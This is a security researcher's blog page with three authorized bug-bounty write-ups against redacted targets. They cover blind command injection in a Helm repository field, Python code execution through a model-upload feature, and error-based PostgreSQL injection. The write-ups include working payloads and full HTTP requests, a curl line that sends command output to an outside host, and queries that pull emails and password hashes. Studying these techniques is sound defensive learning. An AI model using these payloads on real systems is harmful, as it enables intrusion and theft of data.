
About me

Let me introduce myself


A bit about me

I'm Shawar Khan.

With over 4 years of experience, I've identified major security vulnerabilities in some of the world's best-known companies, including Google, Microsoft, Apple, and PayPal. I've been acknowledged by hundreds of companies and listed in over 100 Halls of Fame.

Profile

Shawar Khan


A Security Researcher at HackersRay, Bug Bounty Hunter, and Top 60 Red Team Member & Synack Acropolis at Synack Inc.

Acknowledgements: List Here

Hackerone: View Hackerone profile

Bugcrowd: View Bugcrowd profile

Skills & Things about me

• Web Application Penetration Testing: 100%
• Mobile App Penetration Testing: 100%
• Python Exploit Writing: 100%

Write-Ups

My recent research work


Thursday, January 28, 2021

Analysing crash messages to achieve blind root command injection

 



About the Write-up:

Greetings everyone, this is Shawar Khan, and today I'm going to share one of my recent discoveries, which is quite interesting. It is a command injection vulnerability that I found in a Synack target a few days back, so I'll keep the target redacted for the client's privacy. I'll be referring to the target as redacted.com / Redacted Org.

So, I tested a target on Synack, got some quality reports accepted (IDORs / XSS), and then left the program for a few days. I received a text from a friend telling me he had found another IDOR, so I figured there were still vulnerabilities left. I gave the target another try and got lucky.

The Redacted Org had different roles and allowed users to add Helm repositories, which were further used for retrieving charts in some functionalities. Helm is a package manager for Kubernetes that allows installation and upgrading of Kubernetes applications.


Keeping track of everything:

In this write-up I'll also try to cover common questions I'm frequently asked, one of which is how I start testing an application. Whenever I'm testing an application, my first step is to map all the functionalities available in it. This includes mapping all the functions from the UI as well as functions/endpoints found in JS files. Keeping Burp Suite connected the whole time helps track and extract endpoints and pages properly.

After this step, I try to use and fiddle with every functionality to collect different responses and behaviors, which I can later observe and analyze in Burp History.

Analyzing repository management feature:

The application had a Settings page that allows authenticated users to add Helm repositories. The page took inputs such as URL, name, username, password, and some other fields.



At that moment I tried to test for SSRF, but as soon as I clicked Save, nothing happened. I thought there might be some function that would use this repository to perform actions such as retrieving the repository and installing applications from it. At this point I used a remote host running an Apache service to see if I could catch any ping-backs. I named my repo zzzztest123.
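Any host that logs incoming request paths works for catching ping-backs. The write-up uses Apache; as a stand-in sketch, Python's built-in http.server does the same job (the port and handler name here are my own choices, not part of the original setup):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class PingbackHandler(BaseHTTPRequestHandler):
    """Logs every requested path, which is all we need to spot a ping-back."""

    def do_GET(self):
        # A later payload such as curl http://myprivatehost/`whoami`
        # shows up here with the command output in the path, e.g. /root
        print(f"ping-back from {self.client_address[0]}: {self.path}")
        self.send_response(200)
        self.end_headers()

# To start listening (port 8000 is an arbitrary choice):
# HTTPServer(("0.0.0.0", 8000), PingbackHandler).serve_forever()
```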

Finding features that use the Helm repository:

After exploring the application and checking each and every feature, I came across one that allows a user to create applications, so I created a test application named anythinghere1:



After scrolling down on the application page, I found a feature titled Charts, and it was obvious that it was used for loading charts from a specified repository. I tried using my repository name zzzztest123 with an invalid chart name to see how the application would respond.





This feature was quite a mess: if the application is newly created and the feature is used once, a request is sent to https://redacted.com/api/sd/catalog/applications/helm, but if the feature is used multiple times, requests are made to https://redacted.com/api/sd/catalog/applications/{APPLICATION_ID}. The two endpoints are different and have different request structures and parameters.

Every time I had to change something, I had to recreate an application and perform the same steps again.

So, I used an invalid chart and got the following response:



I found this error message when analyzing my Burp history; the application didn't show any visual error or warning to indicate that something had failed, which was quite weird. I checked the error message carefully to see what was causing it and found this line:


], 
"operatormessage": [
"CLI Error: \"Ds_chart not found\" It happens when the provided chart is not valid (the system cannot locate it)"
],
"result": "PARTIAL_SUCCESS",
"customermessage": [
"[HELM-001] Chart anythinghere1/sdfasdfdsafa not found"
],
"servicename": "MEC_woot_Catalog_awjiopwoefir_1_HelmChart"
}



Next, I created a valid chart and replicated the same request, but got a 201 response and no crash message. Something felt fishy, as the application was quite verbose and had been returning huge crash messages, so I tried everything to make it crash somehow and analyze the error messages.

By simply supplying a chart name, the server makes a request that tries to retrieve a file named index.yaml. If it is a valid file, the application returns 201, but if the file is not found, the application returns the chart-not-found error.

I then discovered a rare condition, which was the main point of this discovery. If we serve an empty index.yaml with no content, the application loads it but gets into a situation it did not expect and returns the following error message:

 "result": "PARTIAL_SUCCESS", 
"customermessage": [
"[HELM-011] CLI Error: \"GLOBAL.GenericCLI_Activate(DO_AND_CHECK, ssh://127.0.0.1,
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE CLI SYSTEM \"CLIv4.dtd\">
<CLI dumpDialog=\"yes\">
<Connect protocol=\"ssh\" ssh.allow_host=\"true\" ssh.identity=\"-\" ssh.isEncrypted=\"yes\" ssh.known_hosts=\".ssh/known_hosts\" ssh.password=\"OzTDoyJMLUSREDACTEDA+681rQ==\" ssh.username=\"root\">
<Do description=\"Empty command to speed up connection\">
<Command send_newline=\"no\"/>
<Prompt>.*\\# *$</Prompt>
</Do>
</Connect>
<Disconnect continuationDelay=\"5000\">
<Do description=\"Initiate disconnect\" timeout=\"1\">
<Command continuationDelay=\"5000\" newline_chars=\"\\n\">
exit
</Command>
</Do>
</Disconnect>
<Activate>
<Action description=\"Add Helm repository\">
<Do timeout=\"600\">
<Command newline_chars=\"\\n\">helm repo add zzzztest123 http://myprivatehost.com/</Command>
<Error message=\"Chart repository unauthorized, check username and password.\">
Error.*is not a valid chart repository or cannot be reached.*401 Unauthorized</Error>
<Error message=\"Chart repository not found.\">Error.*is not a valid chart repository or cannot be reached</Error>
<Error message=\"Incorrect protocol defined in repository url.\">
Error.*could not find protocol handler</Error>
<Prompt>.*\\# $</Prompt>
</Do> </Action>
</Activate>
<Rollback>
<Rewind/>
</Rollback>
</CLI>
) : Matched error pattern - command description: [Add Helm repository]
...
...
...



I was quite shocked to see such a message, as I noticed multiple issues in it. The first was the disclosure of the root user's password. The application used a CLIv4.dtd file and the request was XML, but before that the application connected over SSH to localhost, as indicated by ssh://127.0.0.1. It looked like the server connected to localhost and executed a command there. In the Command entity I found:

helm repo add zzzztest123 http://myprivatehost.com

It was quite weird to see zzzztest123, our repository name, along with the URL I had used in the Helm repository management feature in the settings. The values were being used as positional arguments to the helm repo add command, which adds a given repository to the system. The root cause was that user-controlled data was passed directly into a command without any filtering.

Confirming Command Injection:

At this point, I had two options: use a command injection payload as the repository name or as the URL. This was not possible directly, as the repository management page did not allow special characters, but by sending a valid format and then tampering with the parameters, I could sneak special characters into my payload.

What I needed was to execute another command, and the following were the possibilities:

http://validrepo.com && whoami
http://validrepo.com; whoami 
http://validrepo.com || whoami 

I tried the last one, as || runs the second command whenever the first one fails, ignoring the failure. I then tried to see if I could somehow get the result of the whoami command.
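The behaviour of these separators is easy to check locally. A minimal demonstration (nothing target-specific) of why || was a safe choice:

```python
import subprocess

# `false` always fails; `||` then runs the second command anyway,
# which is exactly the property we want when the first command
# (the injected-into helm invocation) may error out.
result = subprocess.run("false || echo injected", shell=True,
                        capture_output=True, text=True)
print(result.stdout.strip())  # injected
```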

After setting my repository URL to http://myprivatehost.com || whoami, all I got was a 201 response without any command output. At this point I was fairly sure my command ran internally but showed no output, as the application was only programmed to handle specific responses and returns 201 when everything goes well, so I treated this as a blind command injection.

Got Blind? ... CURL!

I tried running curl to send the output of the whoami command to my external host, to see if my command was being executed blindly. I set my repo URL to "http://anyvalidrepo.com/ || curl http://myprivatehost:80/`whoami`", which executes the whoami command wrapped in back-ticks and sends the result to my private server running Apache.




Created a new application, loaded my new repo, and bingo!




A request was sent to my host at /root, where root was the result of the whoami command executed on the vulnerable application. This confirmed the vulnerability, and the report was accepted in no time!






Conclusions:

Never ignore or skip a target just because it has been tested by many other researchers; most of them won't go into every detail, as most people rush to find common vulnerabilities. Always look for something different and unique that no one else would have thought of. Stay persistent when hunting a target, as that is the key to success.


You can't expect a bounty rain by putting in the same effort as everyone else; think outside the box and go one step further! - Shawar Khan



Wednesday, January 6, 2021

Achieving Remote code execution by exploiting variable check feature

 


Greetings everyone, this is Shawar Khan, and this is the first write-up of 2021, so I'm pretty excited to share this discovery with you. Recently, while hunting on Synack, I came across a program with a quality rule, so my focus was on finding something unique and of better quality. I'll refer to the target as redacted.com.

The application was some kind of interface builder and allowed uploading of files such as .py, .txt, .ctx2, and some others, which were further used to build a template for the interface builder. There were some file upload areas where the template could be uploaded, such as the one below:

 

 

Model files having .py, .ctx2 and .txt extensions.

The model section allowed uploading files with these extensions and any content. Opening a file directly did not show any kind of execution. However, when the Interface Builder, located at https://redacted.com/endpoint/builder/#/author1/testpriject8, is accessed, the application asks for a model to be loaded.

I was thinking that it isn't common to see a .py extension being allowed. In this kind of scenario, what I mostly try is to learn how the application processes these files and what we can control in order to achieve something that's normally not possible.

I captured the request that makes changes to the uploaded Python model file, so I could modify it and see the results in Repeater:

POST /endpoint/author1/testpriject8/model/new-file HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1

projectPath=author1%2Ftestpriject8&category=model&directoryPath=&name=test.py&blob=pythoncontent



The blob parameter held the content of the model file, so I kept this request in Repeater. After navigating to the Interface Builder and selecting my Python model file, I noticed a request being made to https://redacted.com/v2/model/introspect/author1/testpriject8/test.py

This was the request sent after selecting the test.py model file. After checking the response of this GET request, I got the following:

HTTP/1.1 200 OK
Server: openresty/1.19.3.1
Date: Mon, 07 Dec 2020 15:31:55 GMT
Content-Type: application/json
Content-Length: 49
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Authorization, Content-Type, Range, X-Autorestore, X-Forio-Confirmation, X-Timeout
Access-Control-Expose-Headers: Content-Range, Content-Type, Range, X-Forio-Redirect
Access-Control-Allow-Methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, no-store

{"functions":null,"ranges":null,"variables":null}



This was somewhat odd, as it returned a JSON response with functions, ranges, and variables all set to null. I guessed these were null because none of them existed in my file content, which was submitted as pythoncontent.


What I tried next was uploading a Python file containing just s=1337, and the application sent the following response:

{
    "variables": [
        {
            "access": "ALWAYS", 
            "ranges": null, 
            "saved": false, 
            "dataType": "NUMBER", 
            "units": null, 
            "name": "s", 
            "formula": null, 
            "maximum": null, 
            "comment": null, 
            "minimum": null
        }
    ], 
    "functions": null, 
    "ranges": null
}



By this point I was sure this was a variable extraction feature. It was extracting all the available variables, functions, and ranges from an uploaded Python file and using them for further processing of a template model.
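A hedged sketch of the dangerous pattern the later traceback suggests (the function name and approach here are my assumptions, not the target's actual code): the uploaded model is executed in order to enumerate its top-level names, which is exactly why arbitrary code ends up running.

```python
def introspect(source: str):
    """Run an uploaded 'model' and report its top-level names.

    Executing untrusted source like this is the root cause of the RCE
    described in this write-up; shown only to illustrate the behaviour.
    """
    namespace = {}
    exec(source, namespace)  # uploaded code runs here
    return [name for name in namespace if not name.startswith("__")]

print(introspect("s=1337"))  # ['s']
```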


I then tried code that references a variable, woot, which did not exist in the code. I sent the value of blob as blob=print(woot) and got the following response:

{
    "type": "python", 
    "message": "NameError: name 'woot' is not defined", 
    "trace": [
        {
            "line": 68, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/REDACTED/worker/python/python_worker.py", 
            "function": "load_model"
        }, 
        {
            "line": 55, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/REDACTED/worker/abstract_worker.py", 
            "function": "load_module"
        }, 
        {
            "line": 37, 
            "type": "python", 
            "file": "/usr/lib/python2.7/importlib/__init__.py", 
            "function": "import_module"
        }, 
        {
            "line": 1, 
            "type": "python", 
            "file": "/home/user/model/REDACTED/test.py", 
            "function": "module"
        }
    ], 
    "information": {
        "code": "MODEL_INITIATION", 
        "runKey": "REDACTED"
    }
}

This was a Python exception caused by the undeclared woot variable, and it is the same exception returned when a statement such as print(woot) is used in a Python console:
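The console behaviour referred to above can be reproduced in any Python interpreter:

```python
# Referencing an undefined name raises the same NameError the
# application returned in its JSON trace.
try:
    print(woot)
except NameError as e:
    print(e)  # name 'woot' is not defined
```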


At this point I was sure my code was being executed, but after some tests I learned there were conditions under which the input executed. If the file contains variables and no exception occurs, the application returns all the available variables and data; but if the code raises an exception, the exception is returned instead of the results.

Now what I needed was to trigger an exception that would carry the output of one of my commands. I tried the following code to see if I could execute it:

import os
os.system('ls')


Uploading this code and making a request to https://redacted.com/v2/model/introspect/author1/testpriject8/test.py returned the following response:

{
    "variables": [
        {
            "access": "ALWAYS", 
            "ranges": null, 
            "saved": false, 
            "dataType": "OBJECT", 
            "units": null, 
            "name": "os", 
            "formula": null, 
            "maximum": null, 
            "comment": null, 
            "minimum": null
        }
    ], 
    "functions": null, 
    "ranges": null
}


This confirmed the command was executed blindly, but as os was an object, it was simply returned in the JSON response, so I had to obtain data another way. The last thing the application does is return all the data after executing the file, so I tried to craft an exception that would contain the result of an executed command. By converting the output of a command to a string with str() and then trying to convert that to an integer with int(), the application raises a ValueError whose message contains the result of the executed command.
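This trick is easy to verify locally: int() raises a ValueError whose message echoes the offending string back, so whatever str() wrapped becomes part of the error text.

```python
import os

try:
    # The directory listing becomes a string, which int() cannot parse;
    # the resulting ValueError message carries the listing itself.
    int(str(os.listdir("/etc/")))
except ValueError as e:
    print(e)  # invalid literal for int() with base 10: "['...', ...]"
```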


I made the following request with blob set to blob=import+os;int(str(os.listdir('/etc/'))), which lists all the files/directories under /etc/ and converts the output to a string and then to an integer:


POST /endpoint/author1/testpriject8/model/edit/test.py HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1

projectPath=author1%2Ftestpriject8&category=model&filePath=%2Ftest.py&blob=import+os;int(str(os.listdir('/etc/')))

 

And now after making a request to Introspect endpoint, I got the following response:

{
    "type": "python", 
    "message": "ValueError: invalid literal for int() with base 10: \"['rc2.d', 'gai.conf', 'ld.so.cache', 'issue', 'rc0.d', 'bindresvport.blacklist', 'default', 'update-motd.d', 'rmt', 'group', 'gshadow', 'deluser.conf', 'machine-id', 'ld.so.conf.d', 'profile', 'skel',\"", 
    "trace": [
        {
            "line": 68, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/redacted/worker/python/python_worker.py", 
            "function": "load_model"
        }, 
        {
            "line": 55, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/redacted/worker/abstract_worker.py", 
            "function": "load_module"
        }


Command executed! The output was 'rc2.d', 'gai.conf', 'ld.so.cache', 'issue', 'rc0.d', 'bindresvport.blacklist', 'default', 'update-motd.d', 'rmt', 'group', 'gshadow', the files available in /etc/ on the vulnerable application.


I submitted the best-quality report to Synack and won the quality rule with 3/3 stars. I asked for permission for further exploitation but was denied, so I didn't proceed further.



Whenever you are testing an application for such issues, always try to understand how the application handles user-provided data. There might be multiple endpoints that perform different tasks on uploaded files; the one in this case was checking for variables but was blindly executing arbitrary code without showing any errors or output.

Some other vulnerabilities were identified as well, which could be chained with this one to allow any unauthenticated user to achieve the same RCE. However, due to lack of time, I wasn't able to build that exploit.

If you like this write-up, share it!

Monday, November 30, 2020

Exploiting blind PostgreSQL injection and exfiltrating data in psycopg2

  



Greetings everyone, this is Shawar Khan, and it's been a while since my last write-up. After being quite busy with Synack, I've made some interesting discoveries, and I'm going to share one of them today.

There are lots of new things I want to share, but at the moment I'm going to disclose one of my recent findings in a web application developed in Python. This was a program on Synack, so I'll refer to the target as redacted.com or Redacted Org.

The target was under a quality rule, which means the best-quality report wins, so my focus was on writing the best report with maximum impact.

 Setting up scope:

I started by setting up the scope, as only specific endpoints were allowed, such as staging.sub.redacted.com/endpoint/:


Setting up Advanced Scope

The option "is in target scope" was ticked so that only in-scope domains would be intercepted.

Understanding application work flow:

The functionality in staging.sub.redacted.com was quite limited, and after analyzing traffic in Burp Suite's history I observed that a single endpoint was responsible for making changes and updates to web pages. I discovered an endpoint at staging.sub.redacted.com/endpoint/_dash-update-component that was receiving a lot of POST requests, each with a unique JSON response. This confirmed the endpoint could handle different data and contained multiple functionalities.


The application had two roles, Admin and User. The admin user was able to add new users to the application and make some changes; later I found a privilege escalation that allowed me to create new users from a user-privileged account.


User creation was also done through _dash-update-component, with the following request:

 POST /endpoint/_dash-update-component HTTP/1.1
Host: staging.sub.redacted.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-CSRFToken: undefined
Origin: https://staging.sub.redacted.com
Content-Length: 710
Connection: close
Cookie: REDACTED

{"output":"createUserSuccess.children","outputs":{"id":"createUserSuccess","property":"children"},"inputs":[{"id":"createUserButton","property":"n_clicks","value":1},{"id":"newUsername","property":"n_submit","value":0},{"id":"newPwd1","property":"n_submit","value":0},{"id":"newPwd2","property":"n_submit","value":0},{"id":"newEmail","property":"n_submit","value":0}],"changedPropIds":["createUserButton.n_clicks"],"state":[{"id":"newUsername","property":"value","value":"test1"},{"id":"newPwd1","property":"value","value":"test123123123"},{"id":"newPwd2","property":"value","value":"test123123123"},{"id":"newEmail","property":"value","value":"test@test.com"},{"id":"role","property":"value","value":"dp"}]}

The request above received the following response, which confirms a new user was created:

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 20:53:18 GMT
Content-Type: application/json
Content-Length: 192
Connection: close

{"response": {"createUserSuccess": {"children": {"props": {"children": ["New User created"], "className": "text-success"}, "type": "Div", "namespace": "dash_html_components"}}}, "multi": true}

While testing this feature for more vulnerabilities, I tried to send the same request again and received the following response:

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 20:53:12 GMT
Content-Type: application/json
Content-Length: 350
Connection: close

{"response": {"createUserSuccess": {"children": {"props": {"children": ["New User not created: (psycopg2.errors.DuplicateSchema) schema \"test1\" already exists\n\n[SQL: CREATE SCHEMA test1]\n(Background on this error at: http://sqlalche.me/e/f405)"], "className": "text-danger"}, "type": "Div", "namespace": "dash_html_components"}}}, "multi": true}

When I tried to create the test1 user again, I received an error message stating New User not created: (psycopg2.errors.DuplicateSchema) schema \"test1\" already exists\n\n[SQL: CREATE SCHEMA test1]. The error appears to be a Python exception that surfaced due to a missing try/except. If exceptions were caught broadly with except Exception, the application would not return any exception details, which was not the case here.

The Python module in use here was psycopg2, which I was not familiar with, so I searched for it and found it is a database adapter for PostgreSQL, confirming the application was running a PostgreSQL database. Moreover, the exception leaked the query CREATE SCHEMA test1, which was shocking, as test1 was the username I had provided. This confirmed my input was passed directly into an SQL query after being retrieved from the newUsername object's value.
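The leaked query suggests the server builds its DDL with plain string interpolation. A minimal sketch of that likely flaw (the function name is hypothetical, reconstructed only from the leaked SQL):

```python
def build_schema_query(username: str) -> str:
    # No quoting or escaping: a ';' in the username terminates the
    # CREATE SCHEMA statement and starts a second, attacker-chosen query.
    return f"CREATE SCHEMA {username}"

print(build_schema_query("testuser1;TEST"))  # CREATE SCHEMA testuser1;TEST
```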

I ran sqlmap on the injection point with risk and level 3, which unfortunately failed. I knew that if there was an SQL injection, I'd have to go for manual exploitation rather than depend on automated tooling.

Proceeding with manual exploitation:

By this point I was sure of the SQL injection, because if a username was created as testuser1;TEST, the application would create a user named testuser1 but throw a syntax error, which confirmed that TEST was executed separately as a query.

New User not created: (psycopg2.errors.SyntaxError) syntax error at or near \"TEST\"\nLINE 1: CREATE SCHEMA testuser1;TEST...\n
   

After trying single or double quotes, the application responded with unclosed-quotation errors, which confirmed our input was not wrapped inside quotes (which was obvious anyway). In order to execute a new query, the first query has to be terminated with ;, so I tried creating a username of test1 AND SELECT version(), but the application converted the spaces to _, so my username became test1_and_select_version(), which didn't work.

A simple bypass is to use comments instead of spaces, so I converted all the spaces to /**/ but ran into the same issue. Upon further tests, I found other bypasses that can be used to insert whitespace: characters such as \n, \r, or \t produce new lines and tabs, and I was able to use them as query separators. This worked since the application was written in Python.

However, I only got two outcomes: either the application created a new user or it returned an error message, and neither case contained the result of version(). The second query runs only if the first query executes, so I had to make sure the user did not already exist, or the query would fail.

I was running out of time under the quality rule, so I tried to see if I could enumerate tables. Before that, I tried a large string such as

test111111;SELECT/**/tessssooooooooooooootessssoooooooooooooooooooooooooooooooooooooooo;

and the application returned an error message which disclosed the following query:

INSERT INTO userdata (username, email, password, roles) VALUES 
(%(username)s, %(email)s, %(password)s, %(roles)s) RETURNING 
userdata.id]\n[parameters: {'username': 
'test111111;SELECT/**/tessssooooooooooooootessssoooooooooooooooooooooooooooooooooooooooo;',
 'email': 'woot@woot.com', 'password': 
'sha256$QY0iWLnG$17f.......',
 'roles': 'dp'

The error message returned was New User not created: (psycopg2.errors.StringDataRightTruncation) value too long for type character varying(80). Reading the error, I found the application had a character limit of 80, so we had limitations to work around.

I was familiar with concatenation bypasses, but the other endpoints were not returning values unfiltered or placed directly; most of them were wrapped in quotes that were properly escaped, so concatenation bypasses were of no use.

From the disclosed query I found the columns of a table, userdata, which held all registered users, and I noted this for later.

Running out of time, I proceeded to enumerate table names. Using the query test1111;SELECT/**/version/**/from/**/existornot; I was able to identify whether a table exists. If a table does not exist, the application returns the error message psycopg2.errors.UndefinedTable) column \"existornot\" does not exist, and if the table exists, it returns psycopg2.errors.UndefinedColumn) column \"version\" does not exist, which likewise shows whether a column exists.
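This oracle is mechanical enough to script. A hypothetical helper (names mine, error strings taken from the responses quoted above) that classifies the two outcomes:

```python
def table_exists(error_message: str) -> bool:
    """Classify the psycopg2 error from a probe like
    test1111;SELECT/**/version/**/from/**/existornot;

    UndefinedColumn means the table resolved and only the fake
    column failed; UndefinedTable means the table itself is missing.
    """
    if "psycopg2.errors.UndefinedColumn" in error_message:
        return True
    if "psycopg2.errors.UndefinedTable" in error_message:
        return False
    raise ValueError("unrecognized error message")

print(table_exists('(psycopg2.errors.UndefinedColumn) column "version" does not exist'))  # True
```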

After trying every query and bypass, I was unable to retrieve information even using SELECT statements; everything ended with a syntax error or a user-created message. I believe this was due to a third query that broke after escaping from the CREATE SCHEMA context.

I reported this vulnerability as a limited blind SQL injection with the possibility of enumerating tables and columns, and asked permission for further exploitation. It is always best to ask for permission before accessing something, as doing so without permission can cause trouble.

Won the Quality Rule! Now what?:

Luckily my report was selected as winner of Quality Rule:

Won the quality rule!

Finally, my report won the quality rule and I was given permission for further exploitation. During my tests, I found something quite interesting: the application provided hints about available columns and tables. I used the query teb2;SELECT/**/password/**/from/**/pg_user; and the application responded with:

{
    "multi": true, 
    "response": {
        "createUserSuccess": {
            "children": {
                "type": "Div", 
                "props": {
                    "className": "text-danger", 
                    "children": [
                        "New User not created: (psycopg2.errors.UndefinedColumn) column \"password\" does not exist\nLINE 1: CREATE SCHEMA t12;SELECT/**/password/**/from/**/pg_user;\n                                    ^\nHINT:  Perhaps you meant to reference the column \"pg_user.passwd\".\n\n[SQL: CREATE SCHEMA t12;SELECT/**/password/**/from/**/pg_user;]\n(Background on this error at: http://sqlalche.me/e/f405)"
                    ]
                }, 
                "namespace": "dash_html_components"
            }
        }
    }
}

The application provided the message HINT: Perhaps you meant to reference the column \"pg_user.passwd\", which disclosed the passwd column, similar in name to password. So the application also discloses similarly named columns and tables, a plus when performing enumeration.

Using type casting to access information:

In past years, I had studied a technique related to type casting, where user input is converted to an incompatible type and the resulting error discloses the information being retrieved. Since we could not retrieve any data directly, I read up on type casting and conversion and found that PostgreSQL has a function named CAST() that converts data types. To cause an exception, I wanted to convert a column to INTEGER so it would disclose the underlying value.

I tried this experiment to retrieve the current DB version using the query test11a1111;SELECT/**/CAST(version()/**/AS/**/INTEGER); and BOOM!:

Disclosed database version()

I received a response containing the string PostgreSQL 12.3 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.3 20140911 (Red Hat 4.8.3-9), 64-bit, which leaked due to the attempted conversion to integer. That was the moment I realized this was it and I had to push further for something big (I didn't know what challenges I was about to face, lol).

Using CAST() was something I had trouble with, as I was limited to 80 characters of input, and a query with CAST() was already 45 characters:

>>>
>>> len("t;SELECT/**/CAST(version()/**/AS/**/INTEGER);")
45
>>>

After searching Google for alternatives to CAST(), I found it is possible to convert data types just by appending ::int, which is far shorter than the previous query. The query t;SELECT\nversion()::int returns the same response but has a lower character count.

>>> len("t;SELECT\nversion()::int")
23
>>>

Using \n instead of /**/ and ::int instead of CAST() saved a lot of characters, which helped with further exploitation.
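The character budget can be checked programmatically. This sketch builds both payload styles (the helper names and the 80-character limit are taken from the write-up; the wrapper functions themselves are hypothetical) and compares their lengths:

```python
# Assumed input limit from the target, per the write-up.
LIMIT = 80

def long_form(expr):
    """Verbose style: /**/ as whitespace plus an explicit CAST()."""
    return f"t;SELECT/**/CAST({expr}/**/AS/**/INTEGER);"

def short_form(expr):
    """Compact style: \n as whitespace plus the ::int shorthand."""
    return f"t;SELECT\n{expr}::int"

for build in (long_form, short_form):
    payload = build("version()")
    print(len(payload), payload.replace("\n", "\\n"))
```

The saved characters are exactly what later leaves room for subqueries with LIMIT/OFFSET.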

I was able to obtain single values from functions such as version() and current_user, and now it was time to retrieve table information.

Obtaining table information:

Next I wanted to retrieve all the available table names, so I tried to access pg_catalog.pg_tables, which holds them. I used the query tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n2)::integer and received the following response:


I received the error New User not created: (psycopg2.errors.CardinalityViolation) more than one row returned by a subquery used as an expression\n\n[SQL: CREATE SCHEMA, which stated that more than one row is not allowed. So if a query returns a list of rows, the application does not show them due to the cardinality violation.

I tried using limit and offset to restrict the output to a single, specific row, and it worked! I was able to retrieve the table name userconfig:

The query tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n1\noffset\n3)::integer returned the output above. This was still a limited approach, the maximum table name length that would fit was 13 characters, and I wanted to list all the available tables:


>>> len("tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n1\noffset\n3)::integer")
80
>>> len("tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n1\noffset\n3)::int")
76


Character limit? Row limit? Seriously...:

I googled for techniques to combine multiple rows into a single one, looking for something similar to MySQL's group_concat that wouldn't burn too many characters. After some research I came up with array_to_string & array_agg: array_agg collects all the returned rows into an array, and array_to_string converts that array into a single string. Using the query b2;select\narray_to_string(array_agg(datname),',')::int\nfrom\npg_database; I was able to obtain the list of available database names:


For retrieving the table list I accessed pg_tables using the query b2;select\narray_to_string(array_agg(tablename),',')::int\nfrom\npg_tables;, which has a length of 72:
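The aggregation trick generalizes to any column. A sketch of the payload builder (the helper and `b2` prefix are hypothetical; the array_agg / array_to_string shape is the one used above), confirming both queries fit the 80-character budget:

```python
def agg_payload(column, table, prefix="b2"):
    """Collapse every row of `column` into one comma-joined string,
    then force a cast error so the whole list leaks at once."""
    return (f"{prefix};select\narray_to_string(array_agg({column}),',')::int"
            f"\nfrom\n{table};")

tables = agg_payload("tablename", "pg_tables")
dbs = agg_payload("datname", "pg_database")
print(len(tables), len(dbs))  # both come out to 72 characters
```

One request per list instead of one request per row: a big win under a cardinality restriction and a character limit at the same time.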

We already knew the columns and the table name userdata from the earlier query disclosure, so how about accessing it as proof that user data can be retrieved?

How about a little row of user data?

The length limit was still an issue, but I was able to retrieve all the available databases, tables and columns. Using the query t3;SELECT\n(select\nemail\nfrom\nuserdata\nlimit\n1\noffset\n5)::int, the application returned the email address of the user at offset 5. I used an offset because I didn't want to dump the entire table, which held hundreds of users:

 



For retrieving a user's password I used t3;SELECT\n(select\npassword\nfrom\nuserdata\nlimit\n1\noffset\n5)::int, which returned a SHA-256 hash:


 

Wrapping it up!:

So, that's it! All information was accessible, and by exploiting this vulnerability I was able to DROP, CREATE and modify any table. For all the people out there spending time learning new stuff, or doubting their skills when they can't find any vulnerabilities: just remember that everything comes with persistence and consistency. If you are willing to do something, you can do it no matter how tough it looks. If you are persistent and dedicated, you can achieve anything.

At the time of the report I thought this was limited to table and column enumeration, but after 11 hours of exploitation and testing I pushed it as far as it could go. Due to a lack of privileges I was not able to get system access, but I got what I wanted.

 


 

Let me know in the comments if you loved this write-up, and share it if it helped you learn new techniques!

 


